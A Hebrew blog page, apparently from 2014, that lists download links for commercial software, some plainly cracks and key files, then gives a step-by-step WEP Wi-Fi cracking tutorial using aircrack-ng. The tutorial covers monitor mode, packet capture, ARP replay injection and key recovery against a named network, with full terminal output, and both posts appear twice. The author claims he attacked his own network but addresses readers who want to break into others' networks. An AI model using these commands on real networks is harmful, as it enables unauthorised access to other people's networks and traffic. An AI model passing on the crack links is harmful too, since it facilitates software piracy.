יום שלישי, 16 בדצמבר 2014
תוכנות
_AcronisTrueImage2015.
https://www.copy.com/s/EgGGQUINKEFkxG8y
SketchUpPro-en-x64
https://www.copy.com/s/cvGOrR1VYMDIRBMF
windows firewall control
https://www.copy.com/s/KsHgvDdfx2pTfYD2
idm
https://drive.google.com/file/d/0B2S1q5U8Tt1PeGg2WE9XRHI5T1U/view?usp=sharing
BlueStacks
https://www.copy.com/s/1Biw9fbExBnBttT4
Driver Genius Professional 14
https://www.copy.com/s/lfQNrKI0ZZpzh33G/Keys.DG.rar
https://www.copy.com/s/OaWJmal3JZGa3o1n/Crack.DG.rar
https://www.copy.com/s/EgGGQUINKEFkxG8y
SketchUpPro-en-x64
https://www.copy.com/s/cvGOrR1VYMDIRBMF
windows firewall control
https://www.copy.com/s/KsHgvDdfx2pTfYD2
idm
https://drive.google.com/file/d/0B2S1q5U8Tt1PeGg2WE9XRHI5T1U/view?usp=sharing
BlueStacks
https://www.copy.com/s/1Biw9fbExBnBttT4
Driver Genius Professional 14
https://www.copy.com/s/lfQNrKI0ZZpzh33G/Keys.DG.rar
https://www.copy.com/s/OaWJmal3JZGa3o1n/Crack.DG.rar
יום חמישי, 11 בדצמבר 2014
WIFI פריצה
לפריצת רשתות יש צורך במערכת לינוקס לא ניתן לבצע זאת במערכת חלונות windows
לשם כן תצטרך את חבילת התוכנות של http://www.AirCrack-ng.org
לפני הכל בדוק כי ערכת השבבים (הציפסט) של הכרטיס רשת תומך בכך בהתאם לסוגים המופיעים ברשימת התואמים באתר התוכנה http://www.aircrack-ng.org/doku.php?id=compatibility_drivers
במידה וכן התקן את כל התוכנות הבאות לפי יעודם
בשביל להחליף את הכרטיס רשת ממצב כרטיס רשת למצב מוניטור airmon-ng
בשביל למצוא רשתות אלחוטיות ותפיסת חבילות airodump-ng
בשביל הזרקת .ivs aireplay-ng
בשביל למצוא את הסיסמא aircrack-ng
---
עוד הסבר-
הפריצה אפשרית כאשר מישהו אחר גולש ברשת שאתה רוצה לפרוץ
צריך 3 טרמינלים פתוחים
טרמינל 1
airmon-ng start wlan0 מעביר למצב מוניטור
airodump-ng mon0 מציג רשתות בסביבה
צריך להעתיק משם 3 דברים
1. המספר של הרשת האלחוטית שנקרא bssid
2. מס' הערוץ ch
3. המק של מי שגולש באותה הרשת station (נמצא למטה באמצע השורה ולידו משמאל יש את המספר של הרשת bssid)
airodump-ng --ivs -c מספר הערוץ --bssid מספר הרשת -w תתקע שם לקובץ mon0 מתחיל לאסוף נתונים של הרשת לתוך קובץ
טרמינל 2
aireplay-ng --arpreplay -b מספר הרשת -h המק של הגולש האנונימי mon0 שולח פקטים לרשת
טרמינל 3
aircrack-ng -b שם הקובץ מספר הרשת
תבדוק מה שם הקובץ. אם בחרת למשל A אז שם הקובץ הוא A-01.IVS
מדריך נוסף מ http://linmagazine.co.il/node/view/49771#.VInsAVWsUlW
ב. הדגמת פיצוח קוד של רשת אלחוטית
פעלתי לפי המדריך. כדי לשמור את הבדיקה הזאת במסגרת החוק פיצחתי את הקוד של הרשת שלי עצמי, שהוגנה בשיטת הקידוד wep ובמפתח הקסהדצימאלי של 64 ביט.
השתמשתי בנוהל הבא:
1. איפיון כרטיס האלחוט.
זה נעשה על ידי הפקודה airmon-ng :
הערה: יתכן והכרטיס שלכם יזכה לכינוי שונה, למשל ra0. בכל הפקודות שיופיעו להלן החליפו wlan0 בכינוי הכרטיס שלכם.
2. השבתת כרטיס האלחוט
זה שלב חיוני, כי אם הכרטיס נעול על רשת מסויימת נקבל הודעות שגיאה לרוב - והמזימה שלנו לא תצא לפועל. שלב זה מתבצע על ידי הרצת הפקודות airmon-ng stop wlan0 ו ifconfig wlan0 down בזו אחר זו.
3. איתחול של המוניטור.
הפקודה היא: airmon-ng start wlan0 בשלב זה נוספת תכונה חדשה לכרטיס האלחוט: מוניטור. אצלי הוא כונה mon0 – אצלכם הוא יכול לזכות בכינוי אחר – השתמשו בו.
4. זיהוי כתובת ה MAC של mon0. הפקודה היא ifconfig -a:
והכתובת היא 00:1C:DF:68:DD:22. מן הראוי להזהיר כאן כי כתובת זו תרשם בלוגים של נקודת הגישה אותה מנסים לפרוץ, ותסגיר את אלו העושים זאת.
5. “ריחרוח" של הרשתות בסביבה. הפקודה היא: airodump-ng mon0:
בכל שורה מופיע הספק השידור (תחת P). היחידות הן dbm- (לוגריתמיות), ולכן ככל שהערך נמוך יותר התחנה חזקה יותר. תחת CH מופיע מספר הערוץ. תחת ENC מופיע סוג הקידוד, ותחת ESSID כינוי התחנה. העמודה השמאלית ביותר, BSSID מפרטת את ה MAC של נקודת הגישה.
אנו רואים ש lulibz היא התחנה החזקה ביותר; כתובת ה MAC שלה היא 00:11:50:29:94:EF , היא משדרת על ערוץ 3 בקידוד wep. היא תהיה "הקרבן" שלנו בתרגיל זה.
נפסיק עכשיו את ביצוע הפקודה הנ"ל על ידי הקלדת ctl+c.
6. אכיפת התקשרות בינינו לבין התחנה המותקפת (lulibz).
הפקודה (בדוגמה שלנו) היא aireplay-ng -1 0 -a 00:11:50:29:94:EF -h 00:1C:DF:68:DD:22 -e lulibz mon0 והפלט שלה הוא:
הופעת ה"סמיילי" בשורה האחרונה היא תנאי להמשך...
7. איסוף data המוחלפת בין נקודת-הגישה (lulibz בדוגמה) ולקוח כלשהו שלה. האיסוף יתבצע לתוך קובץ (הנשמר על שולחן העבודה של bt4) עם הסיומת cap. . מה קל מאשר לקרוא לו בשם התחנה – lulibz?
הפקודה היא: airodump-ng -c 3 -w lulibz --bssid 00:11:50:29:94:EF mon0
והפלט שלה:
ערך ה DATA עולה בהדרגה, בתלות במרחק שלנו מנקודת הגישה המותקפת, ובכמות המידע המוחלף בינה לבין לקוחותיה. כדי לפצח קוד wep בן 64 ביט זקוקים למינימום 10000 נקודות DATA ולקוד בן 128 זקוקים לכ 50000. אם אין תעבורה, הערך של DATA (שהוא 15840 בדוגמה) יעלה בצורה איטית ביותר, בעוד שהקובץ lulibz-01.cap ימשיך לתפוח בצורה פראית, עד שימלא את כל הכונן הקשיח. לכן, אם אין תעבורה - עלינו לאלץ אותה.
לשם כך יש לפתוח קונסול חדש (תוך שמניחים לקודם להמשיך לרוץ).
8. אילוץ תעבורה לנקודת הגישה המותקפת.
הפקודה היא: aireplay-ng -3 -b 00:11:50:29:94:EF -h 00:1C:DF:68:DD:22 mon0
ופלט אופייני נראה כך:
במשך זמן-מה תחזור ההודעה האומרת שלא נוצר קשר, אבל לפתע הוא יווצר. ברגע זה נראה שה DATA בקונסול הקודם מתחילה לדהור.
9. פיצוח.
גם זה נערך בקונסול חדש, שלישי, עם הפקודה:
והפלט הוא:
בידים מיומנות, וקרוב מספיק לנקודת הגישה, נמשך התהליך פחות מחמש דקות!
מסקנה: קידוד זה חלש מדי, בעליל. ובימינו, כשכל-כך הרבה מידע אישי רגיש עובר ברשת – אל תקחו אותו הביתה - for love or money.
לשם כן תצטרך את חבילת התוכנות של http://www.AirCrack-ng.org
לפני הכל בדוק כי ערכת השבבים (הציפסט) של הכרטיס רשת תומך בכך בהתאם לסוגים המופיעים ברשימת התואמים באתר התוכנה http://www.aircrack-ng.org/doku.php?id=compatibility_drivers
במידה וכן התקן את כל התוכנות הבאות לפי יעודם
בשביל להחליף את הכרטיס רשת ממצב כרטיס רשת למצב מוניטור airmon-ng
בשביל למצוא רשתות אלחוטיות ותפיסת חבילות airodump-ng
בשביל הזרקת .ivs aireplay-ng
בשביל למצוא את הסיסמא aircrack-ng
---
עוד הסבר-
הפריצה אפשרית כאשר מישהו אחר גולש ברשת שאתה רוצה לפרוץ
צריך 3 טרמינלים פתוחים
טרמינל 1
airmon-ng start wlan0 מעביר למצב מוניטור
airodump-ng mon0 מציג רשתות בסביבה
צריך להעתיק משם 3 דברים
1. המספר של הרשת האלחוטית שנקרא bssid
2. מס' הערוץ ch
3. המק של מי שגולש באותה הרשת station (נמצא למטה באמצע השורה ולידו משמאל יש את המספר של הרשת bssid)
airodump-ng --ivs -c מספר הערוץ --bssid מספר הרשת -w תתקע שם לקובץ mon0 מתחיל לאסוף נתונים של הרשת לתוך קובץ
טרמינל 2
aireplay-ng --arpreplay -b מספר הרשת -h המק של הגולש האנונימי mon0 שולח פקטים לרשת
טרמינל 3
aircrack-ng -b שם הקובץ מספר הרשת
תבדוק מה שם הקובץ. אם בחרת למשל A אז שם הקובץ הוא A-01.IVS
מדריך נוסף מ http://linmagazine.co.il/node/view/49771#.VInsAVWsUlW
ב. הדגמת פיצוח קוד של רשת אלחוטית
פעלתי לפי המדריך. כדי לשמור את הבדיקה הזאת במסגרת החוק פיצחתי את הקוד של הרשת שלי עצמי, שהוגנה בשיטת הקידוד wep ובמפתח הקסהדצימאלי של 64 ביט.
השתמשתי בנוהל הבא:
1. איפיון כרטיס האלחוט.
זה נעשה על ידי הפקודה airmon-ng :
root@bt:~# airmon-ng
Interface Chipset Driver
wlan0 Ralink RT2870/3070 rt2800usb – [phy0]
הערה: יתכן והכרטיס שלכם יזכה לכינוי שונה, למשל ra0. בכל הפקודות שיופיעו להלן החליפו wlan0 בכינוי הכרטיס שלכם.
2. השבתת כרטיס האלחוט
זה שלב חיוני, כי אם הכרטיס נעול על רשת מסויימת נקבל הודעות שגיאה לרוב - והמזימה שלנו לא תצא לפועל. שלב זה מתבצע על ידי הרצת הפקודות airmon-ng stop wlan0 ו ifconfig wlan0 down בזו אחר זו.
root@bt:~# airmon-ng stop wlan0
Interface Chipset Driver
wlan0 Ralink RT2870/3070 rt2800usb - [phy0]
(monitor mode disabled)
root@bt:~# ifconfig wlan0 down
3. איתחול של המוניטור.
הפקודה היא: airmon-ng start wlan0 בשלב זה נוספת תכונה חדשה לכרטיס האלחוט: מוניטור. אצלי הוא כונה mon0 – אצלכם הוא יכול לזכות בכינוי אחר – השתמשו בו.
root@bt:~# airmon-ng start wlan0
Interface Chipset Driver
wlan0 Ralink RT2870/3070 rt2800usb - [phy0]
(monitor mode enabled on mon0)
4. זיהוי כתובת ה MAC של mon0. הפקודה היא ifconfig -a:
root@bt:~# ifconfig -a
eth0 Link encap:Ethernet HWaddr 00:0c:29:e7:66:8f
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
mon0 Link encap:UNSPEC HWaddr 00-1C-DF-68-DD-22-00-00-00-00-00-00-00-00-00-00
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:338 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:43180 (43.1 KB) TX bytes:0 (0.0 B)
wlan0 Link encap:Ethernet HWaddr 00:1c:df:68:dd:22
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
והכתובת היא 00:1C:DF:68:DD:22. מן הראוי להזהיר כאן כי כתובת זו תרשם בלוגים של נקודת הגישה אותה מנסים לפרוץ, ותסגיר את אלו העושים זאת.
5. “ריחרוח" של הרשתות בסביבה. הפקודה היא: airodump-ng mon0:
root@bt:~# airodump-ng mon0
CH 7 ][ Elapsed: 32 s ][ 2011-01-31 08:03
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:D1:6E:8F:A2 79 3 0 0 13 54e WEP WEP milner1
00:14:D1:C2:F9:33 78 5 0 0 9 54 . OPN TRENDnet
00:25:9C:43:DD:67 77 5 0 0 6 54e WPA TKIP PSK
00:1D:7E:55:94:97 76 17 2 0 11 54 WEP WEP linksys
5C:D9:98:C7:24:CC 73 17 0 0 6 54 WEP WEP SANSONE
00:1B:9E:89:C3:85 73 17 0 0 6 54e WEP WEP milner
00:19:5B:78:FC:42 68 10 1 0 6 54e. WEP WEP lulisa
00:21:63:4D:A7:14 66 18 0 0 1 54e WEP WEP gur
D8:5D:4C:CA:9D:A7 65 16 0 0 5 54e. WPA2 CCMP PSK pollak hot
00:14:D1:C6:BD:31 64 16 0 0 4 54e WPA2 CCMP PSK lulis1
F0:7D:68:5E:FB:F8 43 24 2 0 2 54e. WEP WEP linux
00:11:50:29:94:EF 36 30 0 0 3 54 WEP WEP lulibz
BSSID STATION PWR Rate Lost Packets Probes
(not associated) 00:14:D1:C6:BD:31 62 0 - 1 0 1 lulis1
(not associated) 00:24:23:07:CE:83 48 0 - 1 0 9 lulis
בכל שורה מופיע הספק השידור (תחת P). היחידות הן dbm- (לוגריתמיות), ולכן ככל שהערך נמוך יותר התחנה חזקה יותר. תחת CH מופיע מספר הערוץ. תחת ENC מופיע סוג הקידוד, ותחת ESSID כינוי התחנה. העמודה השמאלית ביותר, BSSID מפרטת את ה MAC של נקודת הגישה.
אנו רואים ש lulibz היא התחנה החזקה ביותר; כתובת ה MAC שלה היא 00:11:50:29:94:EF , היא משדרת על ערוץ 3 בקידוד wep. היא תהיה "הקרבן" שלנו בתרגיל זה.
נפסיק עכשיו את ביצוע הפקודה הנ"ל על ידי הקלדת ctl+c.
6. אכיפת התקשרות בינינו לבין התחנה המותקפת (lulibz).
הפקודה (בדוגמה שלנו) היא aireplay-ng -1 0 -a 00:11:50:29:94:EF -h 00:1C:DF:68:DD:22 -e lulibz mon0 והפלט שלה הוא:
oot@bt:~# aireplay-ng -1 0 -a 00:11:50:29:94:EF -h 00:1C:DF:68:DD:22 -e lulibz mon0
08:07:50 Waiting for beacon frame (BSSID: 00:11:00:00:00:00) on channel 3
08:07:50 Sending Authentication Request (Open System) [ACK]
08:07:50 Authentication successful
08:07:50 Sending Association Request
08:07:55 Sending Authentication Request (Open System) [ACK]
08:07:55 Authentication successful
08:07:55 Sending Association Request
08:08:00 Sending Authentication Request (Open System) [ACK]
08:08:00 Authentication successful
08:08:00 Sending Association Request
08:08:05 Sending Authentication Request (Open System) [ACK]
08:08:05 Authentication successful
08:08:05 Sending Association Request [ACK]
08:08:05 Association successful :-) (AID: 1)
הופעת ה"סמיילי" בשורה האחרונה היא תנאי להמשך...
7. איסוף data המוחלפת בין נקודת-הגישה (lulibz בדוגמה) ולקוח כלשהו שלה. האיסוף יתבצע לתוך קובץ (הנשמר על שולחן העבודה של bt4) עם הסיומת cap. . מה קל מאשר לקרוא לו בשם התחנה – lulibz?
הפקודה היא: airodump-ng -c 3 -w lulibz --bssid 00:11:50:29:94:EF mon0
והפלט שלה:
root@bt:~# airodump-ng -c 3 -w lulibz --bssid 00:11:50:29:94:EF mon0
CH 3 ][ Elapsed: 44 mins ][ 2011-01-23 15:48
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:11:50:29:94:EF 26 100 26150 15840 0 3 54 WEP WEP OPN lulibz
BSSID STATION PWR Rate Lost Packets Probes
00:11:50:29:94:EF 00:26:4D:F0:E4:E9 46 54 - 1 0 17749 lulibz
ערך ה DATA עולה בהדרגה, בתלות במרחק שלנו מנקודת הגישה המותקפת, ובכמות המידע המוחלף בינה לבין לקוחותיה. כדי לפצח קוד wep בן 64 ביט זקוקים למינימום 10000 נקודות DATA ולקוד בן 128 זקוקים לכ 50000. אם אין תעבורה, הערך של DATA (שהוא 15840 בדוגמה) יעלה בצורה איטית ביותר, בעוד שהקובץ lulibz-01.cap ימשיך לתפוח בצורה פראית, עד שימלא את כל הכונן הקשיח. לכן, אם אין תעבורה - עלינו לאלץ אותה.
לשם כך יש לפתוח קונסול חדש (תוך שמניחים לקודם להמשיך לרוץ).
8. אילוץ תעבורה לנקודת הגישה המותקפת.
הפקודה היא: aireplay-ng -3 -b 00:11:50:29:94:EF -h 00:1C:DF:68:DD:22 mon0
ופלט אופייני נראה כך:
root@bt:~# aireplay-ng -3 -b 00:11:50:29:94:EF -h 00:1C:DF:68:DD:22 mon0
08:09:51 Waiting for beacon frame (BSSID: 00:11:50:29:94:EF) on channel 3
Saving ARP requests in replay_arp-0131-080951.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
^Cad 9762247 packets (got 20 ARP requests and 4582797 ACKs), sent 4917910 packets...(2401 pps)
במשך זמן-מה תחזור ההודעה האומרת שלא נוצר קשר, אבל לפתע הוא יווצר. ברגע זה נראה שה DATA בקונסול הקודם מתחילה לדהור.
9. פיצוח.
גם זה נערך בקונסול חדש, שלישי, עם הפקודה:
aircrack-ng -n 64 -b 00:11:50:29:94:EF lulibz1-01.cap
והפלט הוא:
root@bt:~# aircrack-ng -n 64 -b 00:11:00:00:00:00 lulibz-01.cap
Opening lulibz-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 40163 ivs.
Aircrack-ng 1.1 r1738
[00:00:02] Tested 6 keys (got 40163 IVs)
KB depth byte(vote)
0 0/ 1 44(59392) 3A(48128) FC(47360) 13(47104) 9E(47104)
1 0/ 5 DD(50944) 6B(49664) 58(49408) 40(48384) 86(48128)
2 0/ 1 39(53248) 73(48384) AD(48128) 00(47872) 93(47616)
3 0/ 1 16(55808) 6D(48384) 1B(47872) 59(47872) DD(47872)
4 0/ 1 46(57856) 62(48128) 41(47616) DC(47104) AE(46592)
KEY FOUND! [ 11:22:33:44:55 ]
Decrypted correctly: 100%
בידים מיומנות, וקרוב מספיק לנקודת הגישה, נמשך התהליך פחות מחמש דקות!
מסקנה: קידוד זה חלש מדי, בעליל. ובימינו, כשכל-כך הרבה מידע אישי רגיש עובר ברשת – אל תקחו אותו הביתה - for love or money.
יום שבת, 6 בדצמבר 2014
יום שני, 1 בדצמבר 2014
הירשם ל-
רשומות (Atom)